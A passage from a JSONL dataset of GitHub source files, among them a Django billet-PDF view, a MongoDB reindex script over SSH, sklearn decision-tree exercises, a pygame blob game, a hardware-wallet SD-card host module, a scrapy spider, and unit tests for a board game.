= payment.cost\n billet.sacado_nome = client.name\n billet.sacado_documento = client.cnpj\n billet.sacado_cidade = client.city\n billet.sacado_uf = client.state\n billet.sacado_endereco = client.address\n billet.sacado_bairro = client.quarter\n billet.sacado_cep = client.postal_code\n\n response = HttpResponse(mimetype='application/pdf')\n billet_file = BoletoPDF(response)\n billet_file.drawBoleto(billet)\n billet_file.save()\n\n if not request.user.is_staff:\n payment.open_set.create() # regiter how many opens\n\n name = _('billet-{0}.pdf')\n name = name.format(date_format(payment.due_date, 'SHORT_DATE_FORMAT'))\n response['Content-Disposition'] = 'attachment; filename=\"{0}\"'.format(name)\n return response\n","repo_name":"fredericosachweh/amostra2","sub_path":"payments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27511241687","text":"from time import time\nfrom conf import ssh, mongo\n\nimport pymongo\nfrom sshtunnel import SSHTunnelForwarder\n\n\ndef re_index(db_name):\n start = time()\n print(f'reIndex {db_name} collection')\n db[db_name].reindex()\n print(f'End reIndex {db_name} \\n')\n print(f'{db_name} has been reIndex() for {round((time() - start), 3)}ms')\n\n\nserver = SSHTunnelForwarder(\n\n ssh_address_or_host=ssh.get('MONGO_HOST'),\n ssh_port=ssh.get('MONGO_PORT'),\n ssh_username=ssh.get('MONGO_USER'),\n ssh_password=ssh.get('MONGO_PASS'),\n remote_bind_address=('127.0.0.1', 27017)\n\n)\n\nif __name__ == '__main__':\n\n try:\n server.start()\n except:\n print(\"Invalid data in conf.py\")\n else:\n print(f\"ssh {ssh.get('MONGO_USER')}@{ssh.get('MONGO_HOST')}:{ssh.get('MONGO_PORT')} connect...\")\n\n client = pymongo.MongoClient('127.0.0.1', server.local_bind_port)\n db = client[mongo.get('MONGO_COLLECTION_NAME')]\n\n now = time()\n for db_names in db.list_collection_names():\n re_index(db_names)\n print(f'Выполнено: {round(time() - now, 3)} seconds')\n\n server.stop()\n print(f\"ssh {ssh.get('MONGO_USER')}@{ssh.get('MONGO_HOST')}:{ssh.get('MONGO_PORT')} disconnect...\")\n\n\n\n","repo_name":"MartinLuzifer/Rocket.chat","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"17465945062","text":"\"\"\"143. Reorder List\"\"\"\n\n\"\"\"\nApproach:\n 1 2 3 4 5 6\n 1. Find the mid and make the mid.next to Null\n 2. Reverse the list after the mid\n 3. Will use two pointers for each half\n 3.1 l_curr, l_prev, r_curr and r_prev\n 3.2 The prev pointer will be assigned to the curr pointer and curr pointer will move to the next node\n 3.3 The l_prev will point the r_curr\n 3.4 The right pointers will also do the same as the step 3.1 and 3.2\n 3.5 The r_prev will then point to the l_curr\n 3.6 And this is one cycle of the loop until one of the _curr pointer is not becoming None\n\"\"\"\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reorderList(self, head: Optional[ListNode]) -> None:\n \"\"\"\n Do not return anything, modify head in-place instead.\n \"\"\"\n\n # Finding the mid node of the list\n slow_pointer: ListNode = head\n fast_pointer: ListNode = head\n while (fast_pointer.next != None and fast_pointer.next.next != None):\n slow_pointer = slow_pointer.next\n fast_pointer = fast_pointer.next.next\n\n # Separating the list from half and reversing the right half\n fast_pointer = slow_pointer.next\n slow_pointer.next = None\n slow_pointer = None\n temp_pointer: ListNode = None\n while (fast_pointer != None):\n slow_pointer = fast_pointer\n fast_pointer = fast_pointer.next\n slow_pointer.next = temp_pointer\n temp_pointer = slow_pointer\n \n # Applying our approach \n left_prev: ListNode = None\n left_curr: ListNode = head\n right_prev: ListNode = None\n # slow_pointer is the head of the second half\n right_curr: ListNode = slow_pointer\n\n while(left_curr != None and right_curr != None):\n # Assigning the left_prev to left_curr\n left_prev = left_curr\n # Moving the left_curr to the next node\n left_curr = left_curr.next\n # Pointing the left_prev node to the right_curr node\n left_prev.next = right_curr\n # Assigning the right_prev to the right_curr\n right_prev = right_curr\n # Moving the right_curr to the next node\n right_curr = right_curr.next\n # Pointing the right_prev to the left_curr node\n right_prev.next = left_curr\n\n\n\n\n ","repo_name":"AchyutPal21/dsa_python","sub_path":"LinkedList/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"75063126847","text":"''' MOHAMED MOUBARAK MOHAMED MISBAHOU MKOUBOI (1820705) '''\r\n#import sklearn\r\nimport sklearn\r\n\r\n# import decision_tree classifier from scikit\r\nfrom sklearn import tree\r\n\r\n# Convert Features in Int, 1 = 2 seats, 0 = 4 or 5 seats\r\nfeatures = [[150, 1], [250, 1], [660, 0], [1300, 0]]\r\n\r\n# Convert Labels into Int, 1 = Motorbike, 0 = Motorcycle\r\nlabels = [1, 1, 0, 0]\r\n\r\n# Create the Classifier - This is now an empty box of rules\r\nclassifier = tree.DecisionTreeClassifier()\r\n\r\n# We need an Algorithm to train it - scikit comes with fit\r\nclassifier = classifier.fit(features, labels)\r\n\r\n#predict a fruit\r\nclassifier.predict([[8,0]])\r\n\r\ndef whatmoto(feat1, feat2):\r\n motoname = \"\"\r\n moto = classifier.predict([[feat1,feat2]])\r\n if moto == 1:\r\n motoname = \"Motorbike\"\r\n else:\r\n motoname = \"Motorcar\"\r\n return motoname\r\n\r\n#predict a moto\r\nprint(classifier.predict([[8,1]]) , whatmoto(157, 1))\r\n\r\nprint(classifier.predict([[8,0]]) , whatmoto(1000, 0))","repo_name":"Mouba-Mouba/PYTHON","sub_path":"intelligent system/codes and exercises/exercise 2.py","file_name":"exercise 2.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"29879393819","text":"import pygame\nimport numpy as np\nfrom Projectiles import Projectiles\nfrom Food import Food\n\nfrom utils import deflate_func , speed_coeff_func\n\nWHITE = 255,255,255\nGREY = 128,128,128\n\n\n \n\nclass Player:\n\n def __init__(self , rules , blobs_infos):\n \n self.type = \"player\"\n \n self.MAX_SUB_BLOB = rules[\"MAX_SUB_BLOB\"]\n self.actual_sub_blob = 1\n \n self.index = 0\n \n bx , by = rules[\"borders_X\"] , rules[\"borders_Y\"]\n self.borders = pygame.math.Vector2(bx,by)\n \n #= Default speed and size =#\n self.df_speed = rules[\"df_speed\"]\n self.df_size = rules[\"df_size\"]\n self.global_size = self.df_size\n \n #= Number of frames before merging two sub cells =#\n #= For example, 600 frames = 10 seconds at 60 fps =#\n self.merge_time = rules[\"merge_time\"]\n self.collisions_test = np.zeros(self.MAX_SUB_BLOB,dtype=\"bool\")\n self.collisions_time = np.zeros(self.MAX_SUB_BLOB,dtype=\"float\")\n \n #= The blob can shoot projectiles after having a size bigger than shoot_projectile =#\n self.shoot_threshold = rules[\"shoot_threshold\"]\n \n #= The blob can split itself after having a size bigger than division_threshold =#\n self.division_threshold = rules[\"division_threshold\"]\n \n # How size influences speed ( the bigger the faster ) =#\n self.viscosity = rules[\"viscosity\"]\n \n # How much of the mass is converted into a projectile =#\n self.projectile_percentage = rules[\"projectile_percentage\"]\n \n #================================#\n #= Column 0 1 : Position Vector =#\n #= Column 2 3 : Speed Vector =#\n #= Column 4 : Size =#\n blobs_infos[0,0:2] = [bx/2,by/2]\n blobs_infos[0,2:4] = [0,0]\n blobs_infos[0,4] = self.df_size\n #================================#\n \n self.compute_personal_data(blobs_infos)\n \n \n def update(self,target_pos,blobs_infos):\n \n self.compute_personal_data(blobs_infos)\n \n self.move(target_pos,blobs_infos)\n self.deflate(blobs_infos)\n self.join(blobs_infos)\n\n def compute_personal_data(self,blobs_infos):\n '''\n Compute the size, center of gravity\n '''\n \n self.global_size = np.sum(blobs_infos[0:self.actual_sub_blob,4])\n self.center_of_gravity = np.average(blobs_infos[0:self.actual_sub_blob,0:2] , axis=0)\n \n \n \n def move(self,target_pos,blobs_infos):\n \n for i in range(self.actual_sub_blob):\n radius_i = np.sqrt(blobs_infos[i,4] / np.pi)\n \n direction = target_pos - pygame.math.Vector2(blobs_infos[i,0],blobs_infos[i,1])\n direction.normalize_ip()\n \n speedCoeff = speed_coeff_func(blobs_infos[i,4],self.df_size,self.viscosity) \n \n blobs_infos[i,2:4] = ( blobs_infos[i,2:4] + direction * self.df_speed * speedCoeff) / 2\n \n new_pos = blobs_infos[i,0:2] + blobs_infos[i,2:4]\n \n for j in range(self.actual_sub_blob):\n \n if((j!=i) and (self.collisions_test[j] or self.collisions_test[i])):\n radius_j = np.sqrt(blobs_infos[j,4] / np.pi)\n \n # Collision !\n dist = np.linalg.norm(new_pos - blobs_infos[j,0:2])\n if( dist < radius_i+radius_j):\n \n dir = (blobs_infos[i,0:2] - blobs_infos[j,0:2])\n dir = dir / np.linalg.norm(dir)\n \n new_pos = new_pos + dir*(radius_i+radius_j-dist)\n \n blobs_infos[i,0:2] = new_pos\n \n \n blobs_infos[0:self.actual_sub_blob,0] = np.clip(blobs_infos[0:self.actual_sub_blob,0] , 0 , self.borders.x)\n blobs_infos[0:self.actual_sub_blob,1] = np.clip(blobs_infos[0:self.actual_sub_blob,1] , 0 , self.borders.y)\n \n def deflate(self,blobs_infos):\n \n for i in range(self.actual_sub_blob):\n blobs_infos[i,4] -= deflate_func(blobs_infos[i,4])\n \n \n def shoot(self,target_pos,projectiles,borders,blobs_infos):\n \n for i in range(self.actual_sub_blob):\n direction = target_pos - pygame.math.Vector2(blobs_infos[i,0],blobs_infos[i,1])\n direction.normalize_ip()\n \n size = blobs_infos[i,4]\n \n if(size > self.df_size):\n \n pos = pygame.math.Vector2(blobs_infos[i,0],blobs_infos[i,1])\n radius = np.sqrt( size / np.pi )\n \n projectile_size = size * self.projectile_percentage\n projectile_position = pos + pygame.math.Vector2((radius+2)*direction.x,(radius+2)*direction.y)\n \n blobs_infos[i,4] -= projectile_size\n projectiles.add( projectile_position , direction , projectile_size , borders )\n \n\n def split(self,target_pos,blobs_infos):\n \n for i in range(self.actual_sub_blob):\n direction = target_pos - pygame.math.Vector2(blobs_infos[i,0],blobs_infos[i,1])\n direction.normalize_ip()\n \n size = blobs_infos[i,4]\n \n if(size > self.division_threshold): \n\n radius = np.sqrt( size / np.pi )\n \n #= Position Updates =#\n blobs_infos[self.actual_sub_blob,0:2] = blobs_infos[i,0:2] + (radius+25)*np.array([direction.x,direction.y])\n \n #= Speed Updates =#\n blobs_infos[self.actual_sub_blob,2:4] = blobs_infos[i,2:4]*5\n \n #= Size Updates =#\n blobs_infos[i,4] /= 2\n blobs_infos[self.actual_sub_blob,4] = blobs_infos[i,4]\n \n #= Collisions Updates =#\n self.collisions_test[i] = True\n self.collisions_test[self.actual_sub_blob] = True\n \n self.collisions_time[i] = self.merge_time \n self.collisions_time[self.actual_sub_blob] = self.merge_time \n \n self.actual_sub_blob += 1\n \n\n def join(self,blobs_infos):\n '''\n Deals with the merge time of sub_blobs, as well as when sub_blobs are re-joining after a split\n '''\n \n if( self.actual_sub_blob > 1 ):\n \n for i in range(self.actual_sub_blob):\n \n if(self.collisions_test[i]):\n \n self.collisions_time[i] -= 1\n \n if( self.collisions_time[i] == 0 ):\n \n self.collisions_test[i] = False\n \n \n for i in range(self.actual_sub_blob-1):\n radius_i = np.sqrt(blobs_infos[i,4] / np.pi)\n \n for j in range(i+1,self.actual_sub_blob):\n radius_j = np.sqrt(blobs_infos[j,4] / np.pi)\n \n dist = np.linalg.norm( blobs_infos[i,0:2] - blobs_infos[j,0:2] )\n \n if( dist < max(radius_i,radius_j) ) :\n \n # Merge the two cells from the sub array\n blobs_infos[i,0:4] = (blobs_infos[i,0:4] + blobs_infos[j,0:4])/2\n \n blobs_infos[i,4] += blobs_infos[j,4]\n \n # Reorganize the array\n for k in range(j+1,self.actual_sub_blob):\n blobs_infos[k-1] = blobs_infos[k]\n \n self.actual_sub_blob -= 1\n \n def show(self,screen,width,height,camPos,blobs_infos):\n \n for i in range(self.actual_sub_blob):\n screen_pos = pygame.math.Vector2(width/2+blobs_infos[i,0],height/2+blobs_infos[i,1]) - camPos\n \n if(screen_pos.x > 0 and screen_pos.y > 0 and screen_pos.x < width and screen_pos.y < height):\n \n radius = np.sqrt( blobs_infos[i,4] / np.pi )\n if(i==0):\n pygame.draw.circle(screen, WHITE, screen_pos , radius )\n else:\n pygame.draw.circle(screen, GREY , screen_pos , radius )\n \n \n def respawn(self,blobs_list,blobs_infos,rules):\n \n self.actual_sub_blob = 1\n \n bx , by = rules[\"borders_X\"] , rules[\"borders_Y\"]\n \n self.collisions_test = np.zeros(self.MAX_SUB_BLOB,dtype=\"bool\")\n self.collisions_time = np.zeros(self.MAX_SUB_BLOB,dtype=\"float\")\n \n #================================#\n #= Column 0 1 : Position Vector =#\n #= Column 2 3 : Speed Vector =#\n #= Column 4 : Size =#\n collides = True\n \n while(collides):\n \n collides = False\n \n pos = np.array([np.random.randint(0,bx),np.random.randint(0,by)],dtype=\"float\")\n \n i = 0\n while(i < len(blobs_list) and not collides):\n \n for j in range(blobs_list[i].actual_sub_blob):\n radius = np.sqrt(blobs_infos[blobs_list[i].index+j,4] / np.pi) \n \n if( np.linalg.norm(pos - blobs_infos[blobs_list[i].index+j,0:2]) < radius ):\n collides = True\n \n i += 1\n \n blobs_infos[0,0:2] = pos\n blobs_infos[0,2:4] = [0,0]\n blobs_infos[0,4] = self.df_size\n #================================#\n \n self.compute_personal_data(blobs_infos)\n\n \n \n \n","repo_name":"R0mainPinguet/agarBot","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":9914,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"69802852288","text":"from .core import Host, HostError\nfrom platform import fpath\nfrom io import BytesIO\nimport os\nimport platform\nfrom binascii import b2a_base64, a2b_base64, hexlify\nfrom helpers import a2b_base64_stream\n\nclass SDHost(Host):\n \"\"\"\n SDHost class.\n Manages communication with SD card:\n - loading unsigned transaction and authentications\n - saving signed transaction to the card\n \"\"\"\n\n button = \"Open SD card file\"\n settings_button = \"SD card\"\n\n def __init__(self, path, sdpath=fpath(\"/sd\")):\n super().__init__(path)\n self.sdpath = sdpath\n self.f = None\n self.fram = self.path + \"/data\"\n self.sd_file = self.sdpath + \"/signed.psbt\"\n\n def reset_and_mount(self):\n if self.f is not None:\n self.f.close()\n os.remove(self.fram)\n self.f = None\n if not platform.is_sd_present:\n raise HostError(\"SD card is not inserted\")\n platform.mount_sdcard()\n\n def copy(self, fin, fout):\n b = bytearray(100)\n while True:\n l = fin.readinto(b)\n if l == 0:\n break\n fout.write(b, l)\n\n async def get_data(self, raw=False, chunk_timeout=0.1):\n \"\"\"\n Loads host command from the SD card.\n \"\"\"\n self.reset_and_mount()\n try:\n sd_file = await self.select_file([\".psbt\", \".txt\", \".json\"])\n if sd_file is None:\n return\n self.sd_file = sd_file\n with open(self.fram, \"wb\") as fout:\n with open(self.sd_file, \"rb\") as fin:\n # check sign prefix for txs\n start = fin.read(5)\n if self.sd_file.endswith(\".psbt\") and start != b\"sign \":\n fout.write(b\"sign \")\n fout.write(start)\n self.copy(fin, fout)\n self.f = open(self.fram,\"rb\")\n finally:\n platform.unmount_sdcard()\n return self.f\n\n def truncate(self, fname):\n if len(fname) <= 33:\n return fname\n return fname[:18]+\"...\"+fname[-12:]\n\n async def select_file(self, extensions):\n files = sum([[f[0] for f in os.ilistdir(self.sdpath) if f[0].lower().endswith(ext) and f[1] == 0x8000] for ext in extensions], [])\n \n if len(files) == 0:\n raise HostError(\"\\n\\nNo matching files found on the SD card\\nAllowed: %s\" % \", \".join(extensions))\n # elif len(files) == 1:\n # return self.sdpath+\"/\"+ files[0]\n \n files.sort()\n buttons = []\n for ext in extensions:\n title = [(None, ext+\" files\")]\n barr = [(self.sdpath+\"/\"+f, self.truncate(f)) for f in files if f.lower().endswith(ext)]\n if len(barr) == 0:\n buttons += [(None, \"%s files - No files\" % ext)]\n else:\n buttons += title + barr\n \n fname = await self.manager.gui.menu(buttons, title=\"Select a file\", last=(None, \"Cancel\"))\n return fname\n\n def completed_filename(self, filename):\n suffix = \"\" if self.parent is None else (\".\"+hexlify(self.parent.fingerprint).decode())\n if filename.endswith(\".psbt\"):\n return filename.replace(\".psbt\", \".signed%s.psbt\" % suffix)\n arr = filename.split(\".\")\n if len(arr) == 1:\n arr.append(\"completed%s\" % suffix)\n else:\n arr = arr[:-1] + [\"completed%s\" % suffix, arr[-1]]\n return \".\".join(arr)\n\n\n async def send_data(self, stream, *args, **kwargs):\n \"\"\"\n Saves transaction in base64 encoding to SD card\n as psbt.signed. file\n Returns a success message to display\n \"\"\"\n new_fname = self.completed_filename(self.sd_file)\n self.reset_and_mount()\n try:\n if isinstance(stream, str):\n with open(stream, \"rb\") as fin:\n with open(new_fname, \"wb\") as fout:\n self.copy(fin, fout)\n else:\n with open(new_fname, \"wb\") as fout:\n self.copy(stream, fout)\n stream.seek(0)\n finally:\n platform.unmount_sdcard()\n show_qr = await self.manager.gui.prompt(\"Success!\", \"\\n\\nProcessed request is saved to\\n\\n%s\\n\\nShow as QR code?\" % new_fname.split(\"/\")[-1])\n if show_qr:\n await self._show_qr(stream, *args, **kwargs)\n\n @property\n def tmpfile(self):\n return self.path+\"/tmp\"\n\n async def _show_qr(self, stream, meta, *args, **kwargs):\n # if it's str - it's a file\n if isinstance(stream, str):\n with open(stream, \"rb\") as f:\n await self._show_qr(f, meta, *args, **kwargs)\n return\n qrfmt = 1 # always offer simple text animation for qr codes\n start = stream.read(4)\n stream.seek(-len(start), 1)\n if start in [b\"cHNi\", b\"cHNl\"]: # convert from base64 for QR encoder\n with open(self.tmpfile, \"wb\") as f:\n a2b_base64_stream(stream, f)\n with open(self.tmpfile, \"rb\") as f:\n await self._show_qr(f, meta, *args, **kwargs)\n return\n if start in [b\"psbt\", b\"pset\"]:\n # psbt has more options for QR format\n qrfmt = await self.manager.gui.menu(buttons=[\n (1, \"Text\"),\n (2, \"Crypto-psbt\"),\n (3, \"Legacy BCUR\"),\n ], title=\"What format to use?\")\n\n title = meta.get(\"title\", \"Your data:\")\n note = meta.get(\"note\")\n msg = \"\"\n # if qrfmt == 0: # not psbt\n # res = stream.read().decode()\n # msg = meta.get(\"message\", res)\n # await self.manager.gui.qr_alert(title, msg, res, note=note, qr_width=480)\n EncoderCls = None\n if qrfmt == 1:\n from qrencoder import Base64QREncoder as EncoderCls\n elif qrfmt == 2: # we need binary\n from qrencoder import CryptoPSBTEncoder as EncoderCls\n elif qrfmt == 3:\n from qrencoder import LegacyBCUREncoder as EncoderCls\n if EncoderCls is not None:\n with EncoderCls(stream, tempfile=self.path+\"/qrtmp\") as enc:\n await self.manager.gui.qr_alert(title, msg, enc, note=note, qr_width=480)\n","repo_name":"cryptoadvance/specter-diy","sub_path":"src/hosts/sd.py","file_name":"sd.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"en","doc_type":"code","stars":398,"dataset":"github-code","pt":"42"} +{"seq_id":"8729349606","text":"PRESUBMIT_VERSION = '2.0.0'\n\n\ndef CheckChange(input_api, output_api):\n results = []\n try:\n import sys\n old_sys_path = sys.path[:]\n cwd = input_api.PresubmitLocalPath()\n sys.path += [input_api.os_path.join(cwd, '..', '..', '..', '..', 'tools')]\n import web_dev_style.presubmit_support\n results += web_dev_style.presubmit_support.CheckStyleESLint(\n input_api, output_api)\n finally:\n sys.path = old_sys_path\n results += input_api.canned_checks.CheckPatchFormatted(input_api, output_api,\n check_js=True)\n return results\n\ndef CheckTestFilename(input_api, output_api):\n results = []\n\n def IsNameInvalid(affected_file):\n return affected_file.LocalPath().endswith('_tests.ts')\n\n invalid_test_files = input_api.AffectedFiles(include_deletes=False,\n file_filter=IsNameInvalid)\n for f in invalid_test_files:\n results += [\n output_api.PresubmitError(\n f'Disallowed \\'_tests\\' suffix found in \\'{f}\\'. WebUI test files '\n 'must end with \"_test\" suffix instead.')\n ]\n\n return results\n","repo_name":"chromium/chromium","sub_path":"chrome/test/data/webui/PRESUBMIT.py","file_name":"PRESUBMIT.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":16362,"dataset":"github-code","pt":"42"} +{"seq_id":"11050122895","text":"#import tree from sklearn\nfrom sklearn import tree\n#import accuracy_score from sklearn.metrices\nfrom sklearn.metrics import accuracy_score\n#input training data sets\nX_train = [[181, 80, 44], [177, 70, 43], [160, 60, 38], [154, 54, 37], [166, 65, 40], [190, 90, 47], [175, 64, 39],[177, 70, 40], [159, 55, 37], [171, 75, 42], [181, 85, 43]]\nY_train = ['male', 'male', 'female', 'female', 'male', 'male', 'female', 'female', 'female', 'male', 'male']\n#intilizing dicision tree through clf(classifier) variable which store our decision tree\nclf=tree.DecisionTreeClassifier()\n#train our decision tree using fit() function\nclf=clf.fit(X_train,Y_train)\n#provide unlabled datapoint\nX_test=[[198,92,48],[184,84,44],[183,83,44],[166,47,36],[170,60,38],[172,64,39],[182,80,42],[180,80,43]]\n#provide accurate result of unlabled datapoint so that we can check accuracy in last\nY_test=['male','male','male','female','female','female','male','male']\n#store result of prediction in a variable\nY_prediction=clf.predict(X_test)\n#print prediction resultand accuracy of our decision tree\nprint(\"Prediction of Decision tree:\",Y_prediction)\nprint(\"accuracy of Decision tree:\",accuracy_score(Y_test,Y_prediction))","repo_name":"rahul-y/ML-Algo-implementation","sub_path":"DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27150660512","text":"import pkg_resources\nimport logging\nfrom pathlib import Path\nfrom .consts import FFMPEG_FILE, PYINSTALL_PLANNED\n\napp_root = Path.home() / 'Desktop' / 'stille_splitten'\n\nif FFMPEG_FILE is None:\n ffmpeg = 'ffmpeg'\nelse:\n if PYINSTALL_PLANNED:\n ffmpeg = pkg_resources.resource_filename('stille_splitten', FFMPEG_FILE)\n else:\n ffmpeg = Path(FFMPEG_FILE)\n\nSETTINGS = dict(\n batch_processing=False,\n log_level=logging.INFO,\n log_file=app_root / 'stille_splitten.log',\n dir_results=app_root / 'ergebnisse',\n dir_batch_processing=app_root / 'stapelverarbeitung',\n write_results_to_dir=True,\n print_full_sequences=False,\n # (Stille-Schwellwert: dBFS, Stille-Mindestdauer: Sekunden)\n ffmpeg_options=[(-60, 2), (-50, 1), (-70, 2), (-50, 2)],\n cli_input=None,\n run_id=None,\n ffmpeg_binary=ffmpeg,\n tolerance=1.5 # sekunden\n)\n","repo_name":"hogshead-revival-widow/stille_splitten","sub_path":"stille_splitten/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"8208953003","text":"import glob, os\nimport scrapy\nfrom crawler.items import AdoramaItem\nimport json\nfrom lorem_text import lorem\nimport copy\n\n\nclass AdoramaOfflineSpider(scrapy.Spider):\n name = \"offline_adorama\"\n currentDir = os.getcwd()\n rootDir = copy.deepcopy(currentDir)\n\n category = \"\"\n\n # Make sur folder & data files always exist\n folder = \"data\"\n file_name = \"data/adorama_offline.json\"\n\n if not os.path.exists(folder):\n os.mkdir(folder)\n\n open(file_name, \"w+\").close()\n\n # Change current directory & read html file offline\n os.chdir(\"./crawler/html\")\n start_urls = []\n for file in glob.glob(\"*.html\"):\n start_urls.append(\"file://\" + rootDir + \"/crawler/html/\" + file)\n\n # # Single test\n # start_urls = [\"file://\" + rootDir + \"/crawler/html/laptop-apple.html\"]\n\n # Return root dir\n os.chdir(rootDir)\n\n def start_request(self):\n for url in self.start_urls:\n self.logger.info(\"Crawling url............ %s\" % url)\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n item = AdoramaItem()\n products = response.xpath('//div[has-class(\"item-list\")]/div')\n self.category = response.xpath('//div[@class=\"manual-category\"]/text()').get() or \"notfound\"\n\n if len(products) < 1:\n self.logger.info(\"--------------------html empty\")\n\n for product in products:\n\n product_name = (\n product.xpath('./div[@class=\"item-details\"]/h2/a/text()').get().strip()\n or product.xpath('./div[@class=\"item-details\"]/h2/a/text()[2]').get().strip()\n or \"Missing\"\n )\n\n img_url = product.xpath('//div[@class=\"item-img\"]//img/@src').get() or \"/notfound\"\n\n item[\"brand\"] = \"Unknown\" if len(product_name) <= 0 else product_name.split(\" \")[0]\n\n item[\"category\"] = self.category\n item[\"name\"] = product_name\n item[\"description\"] = lorem.paragraphs(5)\n item[\"image\"] = \"https://www.adorama.com/images/product\" + img_url\n item[\"price\"] = product.xpath('//strong[@class=\"your-price\"]/text()').get()[1:]\n\n with open(self.file_name, \"r+\", encoding=\"utf-8\") as file:\n try:\n data = json.load(file)\n except:\n data = {\"products\": []}\n\n data[\"products\"].append(\n {\n \"name\": item[\"name\"],\n \"brand\": item[\"brand\"],\n \"category\": item[\"category\"],\n \"price\": item[\"price\"],\n \"image\": item[\"image\"],\n \"description\": item[\"description\"],\n }\n )\n file.seek(0)\n json.dump(data, file, ensure_ascii=False)\n\n yield item\n pass\n","repo_name":"tienduy-nguyen/ecommerce","sub_path":"crawler/crawler/spiders/adorama_offline.py","file_name":"adorama_offline.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"42"} +{"seq_id":"25003021003","text":"import json\nimport random\nimport string\nfrom http import HTTPMethod\n\nfrom pydantic import BaseSettings\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\n\nfrom db_requester.db import Base, Request, RequestState\n\n\nclass ScriptSettings(BaseSettings):\n db_url: str\n\n\ndef get_random_string(length: int) -> str:\n return \"\".join(random.choices(string.ascii_lowercase, k=length))\n\n\ndef get_random_dict() -> dict[str, str]:\n result = {}\n for i in range(random.randint(0, 5)):\n result[get_random_string(i + 1)] = get_random_string(i + 1)\n return result\n\n\ndef get_random_json_or_none() -> str | None:\n random_dict = get_random_dict()\n if len(random_dict) == 0:\n return None\n return json.dumps(random_dict)\n\n\ndef randomize_request() -> Request:\n return Request(\n uri=f\"/{get_random_string(10)}\",\n method=str(random.choice(list(HTTPMethod))),\n params=get_random_json_or_none(),\n headers=get_random_json_or_none(),\n state=RequestState.pending,\n )\n\n\ndef main() -> None:\n settings = ScriptSettings()\n engine = create_engine(settings.db_url)\n Base.metadata.create_all(engine)\n with Session(engine) as session:\n for request in [randomize_request() for _ in range(random.randint(20, 40))]:\n session.add(request)\n session.commit()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"GrinningSoulGH/db-requester","sub_path":"populate_db.py","file_name":"populate_db.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"38370263275","text":"import unittest\n\nfrom src.Player import Player, NotEnoughResource\nfrom src.Potion import Potion\nfrom src.ResourceType import ResourceType\nfrom src.Tile import Tile, TileType\n\n\nclass TestPlayer(unittest.TestCase):\n\n def setUp(self) -> None:\n self.player = Player()\n self.tile1 = Tile()\n self.tile2 = Tile()\n self.tile3 = Tile(TileType.HERB, 1)\n self.tile4 = Tile(TileType.MUSHROOM, 2)\n self.tile5 = Tile(TileType.CRYSTAL, 2)\n self.tile6 = Tile(TileType.SPIDER_WEB, 3)\n self.tile1.add_neighbour(self.tile2)\n self.tile2.add_neighbour(self.tile3)\n self.tile3.add_neighbour(self.tile4)\n self.tile3.add_neighbour(self.tile5)\n self.tile5.add_neighbour(self.tile6)\n self.player.tile = self.tile1\n\n def test_gathering_from_town(self):\n self.assertRaises(ValueError, self.player.gather)\n\n def test_gathering_from_not_town(self):\n self.player.tile = self.tile3\n for _ in range(1000):\n self.player.gather()\n self.assertLessEqual(self.player.resources[self.tile3.get_token()], self.tile3.ring)\n self.assertGreaterEqual(self.player.resources[self.tile3.get_token()], 0)\n\n def test_hand_limit(self):\n self.player.resources[ResourceType.SPIDER_WEB] = 8\n self.player.tile = self.tile6\n for _ in range(1000):\n self.player.gather()\n self.assertEqual(10, self.player.sum_resources())\n self.assertEqual(0, self.tile6.resource)\n\n def test_moving(self):\n self.player.move_to(self.tile6)\n self.assertSetEqual({self.player}, self.tile6.players)\n self.assertSetEqual(set(), self.tile1.players)\n self.assertEqual(self.tile6, self.player.tile)\n self.assertEqual(1, self.player.actions)\n\n def test_successful_potion(self):\n self.player.resources = {ResourceType.CRYSTAL: 2, ResourceType.HERB: 1, ResourceType.MUSHROOM: 1,\n ResourceType.SPIDER_WEB: 0, ResourceType.BAT_WING: 2}\n self.player.fulfill_order(Potion.Love)\n self.assertDictEqual({ResourceType.CRYSTAL: 0, ResourceType.HERB: 0, ResourceType.MUSHROOM: 0,\n ResourceType.SPIDER_WEB: 0, ResourceType.BAT_WING: 0}, self.player.resources)\n self.assertIn(Potion.Love, self.player.potions)\n self.assertEqual(4, self.player.actions)\n\n def test_unsuccessful_potion(self):\n self.player.resources = {ResourceType.CRYSTAL: 2, ResourceType.HERB: 1, ResourceType.MUSHROOM: 1,\n ResourceType.SPIDER_WEB: 0, ResourceType.BAT_WING: 1}\n self.assertRaises(NotEnoughResource, self.player.fulfill_order, Potion.Love)\n\n def test_sum_point(self):\n self.player.potions.extend([Potion.Love, Potion.Truth, Potion.EyeColorChanging])\n self.assertEqual(7, 